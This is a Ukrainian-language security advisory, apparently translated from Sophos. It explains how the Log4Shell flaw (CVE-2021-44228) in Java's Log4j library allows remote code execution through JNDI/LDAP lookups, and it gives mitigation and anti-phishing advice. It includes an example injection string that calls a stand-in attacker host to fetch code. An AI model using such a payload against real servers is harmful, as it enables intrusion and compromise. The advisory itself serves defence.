Вразливість Java Log4j - Log4Shell - Що сталося і що робити зараз. Після Hafnium, Kaseya або Solarwinds компаніям знову терміново доводиться мати справу з гучною уразливістю сервера під назвою Log4j - Log4Shell. Sophos роз’яснює найважливіші факти та підказує, що робити.
Назва Log4Shell вказує на те, що недолік, який використовують, міститься в популярній бібліотеці коду Java під назвою Log4j (Logging for Java), і якщо зловмисники успішно скористаються уразливістю, вони фактично отримають оболонку — можливість запускати будь-який системний код на ваш вибір.
«Ключовий момент атаки Log4Shell полягає в тому, що сервер автоматично виконує код. Усе, що зловмисник хоче зробити з сервером із уразливістю, він може це зробити. Тому надзвичайно важливо якнайшвидше встановити виправлення, тому що багато людей, які не замислюються, вже намагаються перевірити, які сервери все ще вразливі».
Пол Даклін, експерт із ІТ-безпеки в Sophos
І ніби цієї команди було недостатньо, уразливість була опублікована в Твіттері як уразливість нульового дня, що є недоліком безпеки, який буде задокументовано до того, як буде доступне виправлення. Крім того, підтвердження концепції (PoC) було опубліковано на GitHub, і проблема стала відомою в усьому світі, поки її ще не виправили. З п'ятниці в усьому світі, а також у Німеччині, наприклад, дзвоники дзвонять на сполох BSI оголосив червоний рівень попередження.
Неправильна перевірка введених даних
Уразливість, яка тепер офіційно відома як CVE-2021-44228, виникла, коли на вразливий сервер було надіслано нешкідливий запит, який містив певні дані, наприклад заголовок HTTP, на які кіберзлочинці очікують (або навіть знають), що сервер їх записує. його файл журналу. Дані, введені таким чином, утворюють приховану «міну-пастку», тому що, поки сервер перетворює дані у формат, придатний для реєстрації, він ініціює веб-завантаження як невід’ємну частину створення необхідного запису журналу. І ця дія є складною, тому що якщо дані, які повертаються, є дійсною програмою Java (файл .class, на жаргоні), тоді сервер виконує цей файл, щоб допомогти йому згенерувати дані журналу.
Невиправлена бібліотека Log4j дозволяє реєструвати вимоги
Хитрість полягає в тому, що невиправлені версії бібліотеки Log4j дозволяють реєструвати запити за замовчуванням, щоб ініціювати загальний пошук LDAP (служби каталогів), а також різні інші онлайн-пошуки. Ця «функція» існує, щоб допомогти перетворити не дуже корисні дані, наприклад, ідентифікатори користувачів, як-от OZZJ5JYPVK, у інформацію, зрозумілу людині, яка має сенс у вашій мережі, як у Пітера Міллера. Ці запити виконуються за допомогою широко використовуваного набору інструментів Java під назвою JNDI, скорочення від Java Naming and Directory Interface.
Цей підхід життєздатний, якщо зареєстровані дані, які можуть ініціювати виконання коду на стороні сервера, обмежені серверами каталогів у вашій власній мережі. Однак багато серверів не налаштовано відповідним чином, тому зловмисники можуть спробувати вставити текст на кшталт {$jndi:ldap://dodgy.example:389/badcode} у дані, які, як вони очікують, компанії автоматично реєструватимуть і серверуватимуть
- Використовуйте JNDI, щоб надіслати запит LDAP на вказаний порт (389 у нашому прикладі) на вказаному ненадійному зовнішньому сервері.
- отримати ненадійний вміст у поганому коді розташування.
- запустіть наданий зловмисником код, щоб отримати «допомогу» з журналюванням.
Простіше кажучи, ця практика відома на технічному жаргоні як неавтентифіковане віддалене виконання коду (RCE). Без входу в систему або запиту пароля чи маркера доступу кіберзлочинці можуть використати нешкідливий запит, щоб обманом змусити сервери звітувати, завантажити їхній код і таким чином заразити себе шкідливим програмним забезпеченням. Залежно від того, які права доступу має сервер до внутрішньої мережі, такий RCE може допомогти кіберзлочинцям виконувати різноманітні шкідливі завдання.
І це саме те, що робить поточну шахову точку Log4Shell настільки небезпечною. Зловмисники теоретично можуть викачати дані з самого сервера; Дізнатися подробиці внутрішньої мережі, змінити дані на сервері; викрадати дані з інших серверів у мережі; налаштуйте додаткові бекдори на сервері чи в мережі для майбутніх атак або встановіть додаткове зловмисне програмне забезпечення, таке як мережеві шпигуни, сканери пам’яті, викрадачі даних і криптомайнери.
Що ж тепер робити!
Ліцензіар Apache опублікував практичні поради щодо безпеки на цю тему. Sophos також підсумовує найважливіші речі:
- Оновлення до Apache Log4j 2.15.0. Якщо ви використовуєте Log4j, здається, що будь-яка версія 2.x 2.14.1 і раніших є вразливою за замовчуванням. (Якщо ви все ще використовуєте Log4j 1.x, оновлення також є обов’язковим, оскільки воно більше не надається разом із оновленнями).
- Блокування можливості JNDI надсилати запити до ненадійних серверів. Якщо ви не можете оновити, але використовуєте Log4j 2.10.0 або новішої версії, ви можете встановити для значення конфігурації log4j2.formatMsgNoLookups значення true , що в першу чергу запобігатиме вихідним LDAP і подібним пошукам.
- Перевірка використовуваного середовища виконання Java. Базова збірка Java, яку ви використовуєте, може запобігти виникненню цієї помилки на основі її власної конфігурації за замовчуванням. Наприклад, Apache явно вказує Oracle Java 8u121 як захист від цього RCE.
Чи вразливість також впливає на приватних користувачів?
Log4Shell означає не тільки червоне попередження для компаній, але й приватні користувачі також можуть постраждати від наслідків розриву. Це особливо вірно, коли люди користуються хмарними серверами, якими керує хостингова компанія або інший керований постачальник послуг – будь то блог, форум чи сімейний веб-сайт. Перше, що тут потрібно зробити, — це з’ясувати, чи є ці служби вразливими та коли плануються виправлення. На даний момент, безумовно, доцільніше шукати інформацію на відповідних веб-сайтах, оскільки постачальники, швидше за все, зараз завалені електронними листами.
Звертайте увагу на повідомлення від постачальників послуг
Крім того, слід звернути увагу на офіційні попередження безпеки від онлайн-сервісів, які використовуються в поштовій скриньці... але тут теж важливо бути обережним! Якщо користувачі отримують повідомлення про поточну вразливість системи безпеки (можливо, все ще від відомого постачальника послуг), їм не слід автоматично натискати посилання, надані в сповіщенні, або набирати номери телефонів без критичного вивчення. Такі медіа-підковані кібератаки, як Log4Shell, швидко провокують халявників, які хочуть використати страх користувачів для своїх фішингових атак. У разі сумнівів користувачі повинні знайти власний спосіб отримання інформації за допомогою URL-адрес, адрес електронної пошти або номерів телефонів, які вони використовували раніше.
Більше на Sophos.com
Про Софос Sophos довіряють понад 100 мільйонів користувачів у 150 країнах. Ми пропонуємо найкращий захист від складних ІТ-загроз і втрати даних. Наші комплексні рішення безпеки прості в розгортанні, використанні та керуванні. Вони пропонують найнижчу сукупну вартість володіння в галузі. Sophos пропонує відзначені нагородами рішення для шифрування, рішення безпеки для кінцевих точок, мереж, мобільних пристроїв, електронної пошти та Інтернету. Також є підтримка від SophosLabs, нашої глобальної мережі власних аналітичних центрів. Штаб-квартири Sophos знаходяться в Бостоні, США, та Оксфорді, Великобританія.